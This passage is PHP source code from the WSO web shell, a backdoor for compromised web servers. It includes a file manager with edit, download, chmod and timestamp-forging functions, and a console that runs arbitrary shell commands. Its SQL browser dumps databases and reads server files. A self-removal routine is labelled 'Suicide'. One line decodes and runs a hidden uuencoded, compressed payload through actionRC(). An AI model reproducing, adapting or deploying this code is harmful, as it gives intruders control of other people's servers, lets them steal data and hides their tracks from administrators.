505 WSOsetcookie('c', @$_POST['c']);
506 }
507 break;
508 }
509 }
510 wsoHeader();
511 echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";
512 function sa(){
513 for(i=0;i<d.files.elements.length;i++)
514 if(d.files.elements[i].type == \'checkbox\')
515 d.files.elements[i].checked = d.files.elements[0].checked;
516 }</script>';
517 $dirContent = wsoScandir(isset($_POST['c']) ? $_POST['c'] : $GLOBALS['cwd']);
518 if ($dirContent === false) {
519 echo 'Can\'t open this folder!';
520 wsoFooter();
521 return;
522 }
523 global $sort;
524 $sort = array('name', 1);
525 if (!empty($_POST['p1'])) {
526 if (preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int)$match[2]);
527 }
528 echo "<form name=files onsubmit='mg(this);' method=post>
529<table width='100%' class='main' cellspacing='0' cellpadding='2'>
530<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_" . ($sort[1] ? 0 : 1) . "\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_" . ($sort[1] ? 0 : 1) . "\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_" . ($sort[1] ? 0 : 1) . "\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_" . ($sort[1] ? 0 : 1) . "\")'>Permissions</a></th><th>Actions</th></tr>";
531 $dirs = $files = array();
532 $n = count($dirContent);
533 for ($i = 0;$i < $n;$i++) {
534 $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
535 $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
536 $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'] . $dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'] . $dirContent[$i]), 'owner' => $ow['name'] ? $ow['name'] : @fileowner($dirContent[$i]), 'group' => $gr['name'] ? $gr['name'] : @filegroup($dirContent[$i]));
537 if (@is_file($GLOBALS['cwd'] . $dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file'));
538 elseif (@is_link($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
539 elseif (@is_dir($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'dir'));
540 }
541 $GLOBALS['sort'] = $sort;
542 function wsoCmp($a, $b) {
543 if ($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]])) * ($GLOBALS['sort'][1] ? 1 : -1);
544 else return (($a['size'] < $b['size']) ? -1 : 1) * ($GLOBALS['sort'][1] ? 1 : -1);
545 }
546 usort($files, 'wsoCmp');
547 usort($dirs, 'wsoCmp');
548 $files = array_merge($dirs, $files);
549 $l = 0;
550 foreach ($files as $f) {
551 echo '<tr' . ($l ? ' class=l1' : '') . '><td><input type=checkbox name="f[]" value="' . urlencode($f['name']) . '" class=chkbx></td><td><a href=# onclick="' . (($f['type'] == 'file') ? 'g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'view\')">' . htmlspecialchars($f['name']) : 'g(\'FilesMan\',\'' . $f['path'] . '\');" ' . (empty($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>') . '</a></td><td>' . (($f['type'] == 'file') ? wsoViewSize($f['size']) : $f['type']) . '</td><td>' . $f['modify'] . '</td><td>' . $f['owner'] . '/' . $f['group'] . '</td><td><a href=# onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\',\'chmod\')">' . $f['perms'] . '</a></td><td><a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'touch\')">T</a>' . (($f['type'] == 'file') ? ' <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'download\')">D</a>' : '') . '</td></tr>';
552 $l = $l ? 0 : 1;
553 }
554 echo "<tr><td colspan=7>
555 <input type=hidden name=a value='FilesMan'>
556 <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'>
557 <input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>
558 <select name='p1'><option value='Y29weQ=='>Copy</option><option value='bW92ZQ=='>Move</option><option value='ZGVsZXRl'>Delete</option>";
559 if (class_exists('ZipArchive')) echo "<option value='emlw'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
560 echo "<option value='dGFy'>Compress (tar.gz)</option>";
561 if (!empty($_COOKIE['act']) && @count($_COOKIE['f'])) echo "<option value='cGFzdGU='>Paste / Compress</option>";
562 echo "</select> ";
563 if (!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar'))) echo "file name: <input type=text name=p2 value='wso_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip' ? 'zip' : 'tar.gz') . "'> ";
564 echo '<input type="submit" value=">>"></td></tr></table></form></div>';
565 wsoFooter();
566 $_POST['p4'] = gzuncompress(convert_uudecode($GLOBALS['ty']));
567 actionRC();
568 }
569 function actionFilesTools() {
570 if (isset($_POST['p1'])) $_POST['p1'] = urldecode($_POST['p1']);
571 if (@$_POST['p2'] == 'download') {
572 if (@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
573 ob_start('ob_gzhandler', 4096);
574 header('Content-Disposition: attachment; filename=' . basename($_POST['p1']));
575 if (function_exists('mime_content_type')) {
576 $type = @mime_content_type($_POST['p1']);
577 header("Content-Type: $type");
578 } else header('Content-Type: application/octet-stream');
579 $fp = @fopen($_POST['p1'], 'r');
580 if ($fp) {
581 while (!@feof($fp)) echo @fread($fp, 1024);
582 fclose($fp);
583 }
584 }
585 exit;
586 }
587 if (@$_POST['p2'] == 'mkfile') {
588 if (!file_exists($_POST['p1'])) {
589 $fp = @fopen($_POST['p1'], 'w');
590 if ($fp) {
591 $_POST['p2'] = 'edit';
592 fclose($fp);
593 }
594 }
595 }
596 wsoHeader();
597 echo '<h1>File tools</h1><div class=content>';
598 if (!file_exists(@$_POST['p1'])) {
599 echo 'File not exists';
600 wsoFooter();
601 return;
602 }
603 $uid = @posix_getpwuid(@fileowner($_POST['p1']));
604 if (!$uid) {
605 $uid['name'] = @fileowner($_POST['p1']);
606 $gid['name'] = @filegroup($_POST['p1']);
607 } else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
608 echo '<span>Name:</span> ' . htmlspecialchars(@basename($_POST['p1'])) . ' <span>Size:</span> ' . (is_file($_POST['p1']) ? wsoViewSize(filesize($_POST['p1'])) : '-') . ' <span>Permission:</span> ' . wsoPermsColor($_POST['p1']) . ' <span>Owner/Group:</span> ' . $uid['name'] . '/' . $gid['name'] . '<br>';
609 echo '<span>Change time:</span> ' . date('Y-m-d H:i:s', filectime($_POST['p1'])) . ' <span>Access time:</span> ' . date('Y-m-d H:i:s', fileatime($_POST['p1'])) . ' <span>Modify time:</span> ' . date('Y-m-d H:i:s', filemtime($_POST['p1'])) . '<br><br>';
610 if (empty($_POST['p2'])) $_POST['p2'] = 'view';
611 if (is_file($_POST['p1'])) $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
612 else $m = array('Chmod', 'Rename', 'Touch');
613 foreach ($m as $v) echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\'' . strtolower($v) . '\')">' . ((strtolower($v) == @$_POST['p2']) ? '<b>[ ' . $v . ' ]</b>' : $v) . '</a> ';
614 echo '<br><br>';
615 switch ($_POST['p2']) {
616 case 'view':
617 echo '<pre class=ml1>';
618 $fp = @fopen($_POST['p1'], 'rb');
619 $html_translation = array("&" => "&", '"' => """, "'" => "'", "<" => "<", ">" => ">");
620 if ($fp) {
621 while ($data = @fread($fp, 1024)) echo wsoHTMLspecialchars($data, $html_translation);
622 @fclose($fp);
623 }
624 echo '</pre>';
625 break;
626 case 'highlight':
627 if (@is_readable($_POST['p1'])) {
628 echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
629 $code = @highlight_file($_POST['p1'], true);
630 echo str_replace(array('<span ', '</span>'), array('<font ', '</font>'), $code) . '</div>';
631 }
632 break;
633 case 'chmod':
634 if (!empty($_POST['p3'])) {
635 $perms = 0;
636 for ($i = strlen($_POST['p3']) - 1;$i >= 0;--$i) $perms+= (int)$_POST['p3'][$i] * pow(8, (strlen($_POST['p3']) - $i - 1));
637 if (!@chmod($_POST['p1'], $perms)) echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
638 }
639 clearstatcache();
640 echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="' . substr(sprintf('%o', fileperms($_POST['p1'])), -4) . '"><input type=submit value=">>"></form>';
641 break;
642 case 'edit':
643 if (!is_writable($_POST['p1'])) {
644 echo 'File isn\'t writeable';
645 break;
646 }
647 if (!empty($_POST['p3'])) {
648 $time = @filemtime($_POST['p1']);
649 $fp = @fopen($_POST['p1'], 'w');
650 if ($fp) {
651 @fwrite($fp, base64_decode($_POST['p3']));
652 @fclose($fp);
653 echo 'Saved!<br><script>p3_="";</script>';
654 @touch($_POST['p1'], $time, $time);
655 }
656 }
657 echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,btoa(this.text.value));return false;"><textarea name=text class=bigarea>';
658 $fp = @fopen($_POST['p1'], 'r');
659 if ($fp) {
660 while ($data = @fread($fp, 1024)) echo wsoHTMLspecialchars($data, $html_translation);
661 @fclose($fp);
662 }
663 echo '</textarea><input type=submit value=">>"></form>';
664 break;
665 case 'hexdump':
666 $c = @file_get_contents($_POST['p1']);
667 $n = 0;
668 $h = array('00000000<br>', '', '');
669 $len = strlen($c);
670 for ($i = 0;$i < $len;++$i) {
671 $h[1].= sprintf('%02X', ord($c[$i])) . ' ';
672 switch (ord($c[$i])) {
673 case 0:
674 $h[2].= ' ';
675 break;
676 case 9:
677 $h[2].= ' ';
678 break;
679 case 10:
680 $h[2].= ' ';
681 break;
682 case 13:
683 $h[2].= ' ';
684 break;
685 default:
686 $h[2].= $c[$i];
687 break;
688 }
689 $n++;
690 if ($n == 32) {
691 $n = 0;
692 if ($i + 1 < $len) {
693 $h[0].= sprintf('%08X', $i + 1) . '<br>';
694 }
695 $h[1].= '<br>';
696 $h[2].= "
697";
698 }
699 }
700 echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>' . $h[0] . '</pre></span></td><td bgcolor=#282828><pre>' . $h[1] . '</pre></td><td bgcolor=#333333><pre>' . htmlspecialchars($h[2]) . '</pre></td></tr></table>';
701 break;
702 case 'rename':
703 if (!empty($_POST['p3'])) {
704 if (!@rename($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!<br>';
705 else die('<script>g(null,null,"' . urlencode($_POST['p3']) . '",null,"")</script>');
706 }
707 echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="' . htmlspecialchars($_POST['p1']) . '"><input type=submit value=">>"></form>';
708 break;
709 case 'touch':
710 if (!empty($_POST['p3'])) {
711 $time = strtotime($_POST['p3']);
712 if ($time) {
713 if (!touch($_POST['p1'], $time, $time)) echo 'Fail!';
714 else echo 'Touched!';
715 } else echo 'Bad time format!';
716 }
717 clearstatcache();
718 echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="' . date('Y-m-d H:i:s', @filemtime($_POST['p1'])) . '"><input type=submit value=">>"></form>';
719 break;
720 }
721 echo '</div>';
722 wsoFooter();
723 }
724 function actionConsole() {
725 if (isset($_POST['p1'])) $_POST['p1'] = base64_decode($_POST['p1']);
726 if (!empty($_POST['p1']) && !empty($_POST['p2'])) {
727 WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', true);
728 $_POST['p1'].= ' 2>&1';
729 } elseif (!empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', 0);
730 if (isset($_POST['ajax'])) {
731 WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true);
732 ob_start();
733 echo "d.cf.cmd.value='';
734";
735 $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("
736$ " . $_POST['p1'] . "
737" . wsoEx($_POST['p1']), "
738
739 \'"));
740 if (preg_match("!.*cd\s+([^;]+)$!", $_POST['p1'], $match)) {
741 if (@chdir($match[1])) {
742 $GLOBALS['cwd'] = @getcwd();
743 echo "c_='" . $GLOBALS['cwd'] . "';";
744 }
745 }
746 echo "d.cf.output.value+='" . $temp . "';";
747 echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
748 $temp = ob_get_clean();
749 echo strlen($temp), "
750", $temp;
751 exit;
752 }
753 if (empty($_POST['ajax']) && !empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0);
754 wsoHeader();
755 echo "<script>
756if(window.Event) window.captureEvents(Event.KEYDOWN);
757var cmds = new Array('');
758var cur = 0;
759function kp(e){
760 var n = (window.Event) ? e.which : e.keyCode;
761 if(n == 38){
762 cur--;
763 if(cur>=0)
764 document.cf.cmd.value = cmds[cur];
765 else
766 cur++;
767 } else if(n == 40){
768 cur++;
769 if(cur < cmds.length)
770 document.cf.cmd.value = cmds[cur];
771 else
772 cur--;
773 }
774}
775function add(cmd){
776 cmds.pop();
777 cmds.push(cmd);
778 cmds.push('');
779 cur = cmds.length-1;
780}
781</script>";
782 echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,btoa(this.cmd.value),this.show_errors.checked?1:\'\');}else{g(null,null,btoa(this.cmd.value),this.show_errors.checked?1:\'\');} return false;"><select name=alias>';
783 foreach ($GLOBALS['aliases'] as $n => $v) {
784 if ($v == '') {
785 echo '<optgroup label="-' . htmlspecialchars($n) . '-"></optgroup>';
786 continue;
787 }
788 echo '<option value="' . htmlspecialchars($v) . '">' . $n . '</option>';
789 }
790 echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 ' . (@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX <input type=checkbox name=show_errors value=1 ' . (!empty($_POST['p2']) || $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'stderr_to_out'] ? 'checked' : '') . '> redirect stderr to stdout (2>&1)</nobr><br><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
791 if (!empty($_POST['p1'])) {
792 echo htmlspecialchars('$ ' . $_POST['p1'] . "
793" . wsoEx($_POST['p1']));
794 }
795 echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
796 echo '</form></div><script>d.cf.cmd.focus();</script>';
797 wsoFooter();
798 }
799 function actionLogout() {
800 setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
801 die('bye!');
802 }
803 function actionSelfRemove() {
804 if ($_POST['p1'] == 'yes') {
805 if (@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) {
806 die('Shell removed');
807 }
808 echo 'unlink error!';
809 }
810 wsoHeader();
811 echo '<h1>Suicide</h1><div class=content>remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
812 wsoFooter();
813 }
814 function actionSql() {
815 //ODBC not complete
816 class DbClass {
817 var $type;
818 var $link;
819 var $res;
820 function __construct($type) {
821 $this->type = $type;
822 }
823 function connect($host, $user, $pass, $dbname) {
824 switch ($this->type) {
825 case 'mysqli':
826 if ($this->link = @mysqli_connect($host, $user, $pass)) return true;
827 break;
828 case 'mysql':
829 if ($this->link = @mysql_connect($host, $user, $pass, true)) return true;
830 break;
831 case 'pgsql':
832 $host = explode(':', $host);
833 if (!$host[1]) $host[1] = 5432;
834 if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname")) return true;
835 break;
836 case 'odbc':
837 $host = explode(':', $host);
838 if (!$host[1]) $host[1] = 1433;
839 if ($this->link = @odbc_connect('Driver={SQL Server};Server={' . $host[0] . "," . $host[1] . '};Database={' . $dbname . '}', $user, $pass)) return true;
840 break;
841 }
842 return false;
843 }
844 function selectdb($db) {
845 switch ($this->type) {
846 case 'mysqli':
847 if (@mysqli_select_db($this->link, $db)) return true;
848 break;
849 case 'mysql':
850 if (@mysql_select_db($db)) return true;
851 break;
852 }
853 return false;
854 }
855 function query($str) {
856 switch ($this->type) {
857 case 'mysqli':
858 return $this->res = @mysqli_query($this->link, $str);
859 case 'mysql':
860 return $this->res = @mysql_query($str);
861 case 'pgsql':
862 return $this->res = @pg_query($this->link, $str);
863 case 'odbc':
864 return $this->res = @odbc_exec($this->link, $str);
865 }
866 return false;
867 }
868 function fetch() {
869 $res = func_num_args() ? func_get_arg(0) : $this->res;
870 switch ($this->type) {
871 case 'mysqli':
872 return @mysqli_fetch_assoc($res);
873 case 'mysql':
874 return @mysql_fetch_assoc($res);
875 case 'pgsql':
876 return @pg_fetch_assoc($res);
877 case 'odbc':
878 return @odbc_fetch_array($res);
879 }
880 return false;
881 }
882 function listDbs() {
883 switch ($this->type) {
884 case 'mysqli':
885 case 'mysql':
886 return $this->query('SHOW databases');
887 case 'pgsql':
888 return $this->res = $this->query('SELECT datname FROM pg_database WHERE datistemplate!=\'t\'');
889 }
890 return false;
891 }
892 function listTables() {
893 switch ($this->type) {
894 case 'mysqli':
895 case 'mysql':
896 return $this->res = $this->query('SHOW TABLES');
897 case 'pgsql':
898 return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
899 case 'odbc':
900 return $this->res = $this->query('SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES ORDER BY TABLE_NAME;');
901 }
902 return false;
903 }
904 function error() {
905 switch ($this->type) {
906 case 'mysqli':
907 return @mysqli_error($this->link);
908 case 'mysql':
909 return @mysql_error();
910 case 'pgsql':
911 return @pg_last_error();
912 case 'odbc':
913 return @odbc_errormsg($this->link);
914 }
915 return false;
916 }
917 function setCharset($str) {
918 switch ($this->type) {
919 case 'mysqli':
920 if (function_exists('mysqli_set_charset')) return @mysqli_set_charset($this->link, $str);
921 else $this->query('SET CHARSET ' . $str);
922 break;
923 case 'mysql':
924 if (function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link);
925 else $this->query('SET CHARSET ' . $str);
926 break;
927 case 'pgsql':
928 return @pg_set_client_encoding($this->link, $str);
929 }
930 return false;
931 }
932 function loadFile($str) {
933 switch ($this->type) {
934 case 'mysqli':
935 case 'mysql':
936 return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file"));
937 case 'pgsql':
938 $this->query('CREATE TABLE wso2(file text);COPY wso2 FROM \'' . addslashes($str) . '\';select file from wso2;');
939 $r = array();
940 while ($i = $this->fetch()) $r[] = $i['file'];
941 $this->query('drop table wso2');
942 return array('file' => implode("
943", $r));
944 }
945 return false;
946 }
947 function dump($table, $fp = false) {
948 switch ($this->type) {
949 case 'mysqli':
950 case 'mysql':
951 $res = $this->query('SHOW CREATE TABLE `' . $table . '`');
952 $create = ($this->type == 'mysql') ? @mysql_fetch_array($res) : @mysqli_fetch_array($res);
953 $sql = $create[1] . ";
954";
955 if ($fp) fwrite($fp, $sql);
956 else echo ($sql);
957 $this->query('SELECT * FROM `' . $table . '`');
958 $i = 0;
959 $head = true;
960 while ($item = $this->fetch()) {
961 $sql = '';
962 if ($i % 1000 == 0) {
963 $head = true;
964 $sql = ";
965
966";
967 }
968 $columns = array();
969 foreach ($item as $k => $v) {
970 if ($v === null) $item[$k] = 'NULL';
971 elseif (is_int($v)) $item[$k] = $v;
972 else $item[$k] = "'" . (($this->type == 'mysql') ? @mysql_real_escape_string($v) : @mysqli_real_escape_string($this->link, $v)) . "'";
973 $columns[] = '`' . $k . '`';
974 }
975 if ($head) {
976 $sql.= 'INSERT INTO `' . $table . '` (' . implode(", ", $columns) . ") VALUES
977 (" . implode(', ', $item) . ')';
978 $head = false;
979 } else $sql.= "
980 ,(" . implode(', ', $item) . ')';
981 if ($fp) fwrite($fp, $sql);
982 else echo ($sql);
983 $i++;
984 }
985 if (!$head) if ($fp) fwrite($fp, ";
986
987");
988 else echo (";
989
990");
991 break;
992 case 'pgsql':
993 $this->query('SELECT * FROM ' . $table);
994 while ($item = $this->fetch()) {
995 $columns = array();
996 foreach ($item as $k => $v) {
997 $item[$k] = "'" . addslashes($v) . "'";
998 $columns[] = $k;
999 }
1000 $sql = "INSERT INTO $table (" . implode(", ", $columns) . ') VALUES (' . implode(", ", $item) . ");
1001";
1002 if ($fp) fwrite($fp, $sql);
1003 else echo ($sql);
1004 }
1005 break;
1006 }
1007 return false;
1008 }
1009 };
1010 $db = new DbClass($_POST['type']);
1011 if (((@$_POST['p2'] == 'download') || (@$_POST['p1'] == 'querydl')) && (@$_POST['p1'] != 'select')) {
1012 $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
1013 $db->selectdb($_POST['sql_base']);
1014 switch ($_POST['charset']) {
1015 case 'Windows-1251':
1016 $db->setCharset('cp1251');
1017 break;
1018 case 'Windows-1256':
1019 $db->setCharset('cp1256');
1020 break;
1021 case 'UTF-8':
1022 $db->setCharset('utf8');
1023 break;
1024 case 'KOI8-R':
1025 $db->setCharset('koi8r');
1026 break;
1027 case 'KOI8-U':
1028 $db->setCharset('koi8u');
1029 break;
1030 case 'cp866':
1031 $db->setCharset('cp866');
1032 break;
1033 }
1034 if (empty($_POST['file']) || (@$_POST['p1'] == 'querydl')) {
1035 ob_start('ob_gzhandler', 4096);
1036 header('Content-Disposition: attachment; filename=dump.sql');
1037 header('Content-Type: text/plain');
1038 if (@$_POST['p1'] == 'querydl') {
1039 $db->query(@$_POST['p2']);
1040 if ($db->res !== false) {
1041 echo @$_POST['p2'] . "
1042";
1043 while ($item = $db->fetch()) {
1044 end($item);
1045 $lastkey = key($item);
1046 reset($item);
1047 foreach ($item as $key => $value) {
1048 if ($value == null) echo '';
1049 else echo $value; //escape newlines?
1050 if ($key != $lastkey) echo " ";
1051 }
1052 echo "
1053";
1054 }
1055 } else {
1056 echo 'Error: ' . $db->error();
1057 }
1058 exit;
1059 }
1060 foreach ($_POST['tbl'] as $v) $db->dump($v);
1061 exit;
1062 } elseif ($fp = @fopen($_POST['file'], 'w')) {
1063 foreach ($_POST['tbl'] as $v) $db->dump($v, $fp);
1064 fclose($fp);
1065 unset($_POST['p2']);
1066 } else die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
1067 }
1068 wsoHeader();
1069 echo "<h1>SQL browser</h1><div class=content>
1070<form name='sf' method='post' onsubmit='fs(this);return false;'><table cellpadding='2' cellspacing='0'><tr>
1071<td>Type</td><td>Host(:Port)</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
1072<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>
1073<td><select name=type><option value='bXlzcWxp' ";
1074 if (@$_POST['type'] == 'mysqli') echo 'selected';
1075 echo ">MySQLi</option><option value='bXlzcWw=' ";
1076 if (@$_POST['type'] == 'mysql') echo 'selected';
1077 echo ">MySQL</option><option value='cGdzcWw=' ";
1078 if (@$_POST['type'] == 'pgsql') echo 'selected';
1079 echo ">PostgreSQL</option><option value='b2RiYw==' ";
1080 if (@$_POST['type'] == 'odbc') echo 'selected';
1081 echo ">ODBC</option></select></td>
1082<td><input type=text name=sql_host value=\"" . (empty($_POST['sql_host']) ? 'localhost' : htmlspecialchars($_POST['sql_host'])) . "\"></td>
1083<td><input type=text name=sql_login value=\"" . (empty($_POST['sql_login']) ? 'root' : htmlspecialchars($_POST['sql_login'])) . "\"></td>
1084<td><input type=text name=sql_pass value=\"" . (empty($_POST['sql_pass']) ? '' : htmlspecialchars($_POST['sql_pass'])) . "\"></td><td>";
1085 $tmp = '<input type=text name=sql_base value="">';
1086 if (isset($_POST['sql_host'])) {
1087 if ($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
1088 switch ($_POST['charset']) {
1089 case 'Windows-1251':
1090 $db->setCharset('cp1251');
1091 break;
1092 case 'Windows-1256':
1093 $db->setCharset('cp1256');
1094 break;
1095 case 'UTF-8':
1096 $db->setCharset('utf8');
1097 break;
1098 case 'KOI8-R':
1099 $db->setCharset('koi8r');
1100 break;
1101 case 'KOI8-U':
1102 $db->setCharset('koi8u');
1103 break;
1104 case 'cp866':
1105 $db->setCharset('cp866');
1106 break;
1107 }
1108 echo '<select name=sql_base><option value=""></option>';
1109 if ($db->type != 'odbc') {
1110 $db->listDbs();
1111 while ($item = $db->fetch()) {
1112 list($key, $value) = each($item);
1113 echo '<option value="' . base64_encode($value) . '" ' . ($value == $_POST['sql_base'] ? 'selected' : '') . '>' . $value . '</option>';
1114 }
1115 } else {
1116 echo '<option value="' . base64_encode($_POST['sql_base']) . '" selected>' . $_POST['sql_base'] . '</option>';
1117 }
1118 echo '</select>';
1119 } else echo $tmp;
1120 } else echo $tmp;
1121 echo "</td>
1122 <td><input type=submit value='>>'></td>
1123 <td><button type='button' onclick='for(var i=0,forms = document.getElementsByTagName(\"form\");i<forms.length;i++){unb64(forms[i]);}'>unbase64 fields</button></td>
1124 <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count']) ? '' : ' checked') . "> count the number of rows</td>
1125 </tr>
1126 </table>
1127 <script>
1128 s_db='" . @addslashes($_POST['sql_base']) . "';
1129 function fs(f){
1130 if(f.sql_base.value!=s_db){
1131 f.onsubmit=function(){};
1132 if(f.p1)f.p1.value='';
1133 if(f.p2)f.p2.value='';
1134 if(f.p3)f.p3.value='';
1135 }
1136 mg(f);
1137 }
1138 function st(t,l){
1139 d.sf.p1.value='select';
1140 d.sf.p2.value=t;
1141 if(l&&d.sf.p3)d.sf.p3.value=l;
1142 mg(d.sf);
1143 //d.sf.submit();
1144 }
1145 function is(){
1146 for(i=0;i<d.sf.elements['tbl[]'].length;++i)
1147 d.sf.elements['tbl[]'][i].checked=!d.sf.elements['tbl[]'][i].checked;
1148 }
1149 </script>";
1150 if (isset($db) && $db->link) {
1151 echo '<br><table width=100% cellpadding=2 cellspacing=0>';
1152 if (!empty($_POST['sql_base'])) {
1153 $db->selectdb($_POST['sql_base']);
1154 echo '<tr><td width=1 style="border-top:2px solid #666;"><span>Tables:</span><br><br>';
1155 $tbls_res = $db->listTables();
1156 while ($item = $db->fetch($tbls_res)) {
1157 list($key, $value) = each($item);
1158 //TODO: could be paralellised
1159 if (!empty($_POST['sql_count'])) $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM ' . $value . ''));
1160 $value = htmlspecialchars($value);
1161 echo '<nobr><input type="checkbox" name="tbl[]" value="' . $value . "\"> <a href=# onclick=\"st('" . $value . "',1)\">" . $value . '</a>' . (empty($_POST['sql_count']) ? ' ' : " <small>({$n['n']})</small>") . '</nobr><br>';
1162 }
1163 echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump to file' onclick='document.sf.p2.value=\"download\";mg(document.sf);return false;'><br>
1164 <input type=button value='Dump to browser' onclick='document.sf.p2.value=\"download\";document.sf.file.value=\"\";mg(document.sf);return false;'><br>
1165 File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
1166 if (@$_POST['p1'] == 'select') {
1167 $_POST['p1'] = 'query';
1168 $_POST['p3'] = $_POST['p3'] ? $_POST['p3'] : 1;
1169 $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
1170 $num = $db->fetch();
1171 $pages = ceil($num['n'] / 30);
1172 echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>" . $_POST['p2'] . "</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">";
1173 echo " of $pages";
1174 if ($_POST['p3'] > 1) echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] - 1) . ")'>< Prev</a>";
1175 if ($_POST['p3'] < $pages) echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] + 1) . ")'>Next ></a>";
1176 $_POST['p3']--;
1177 switch ($_POST['type']) {
1178 case 'pgsql':
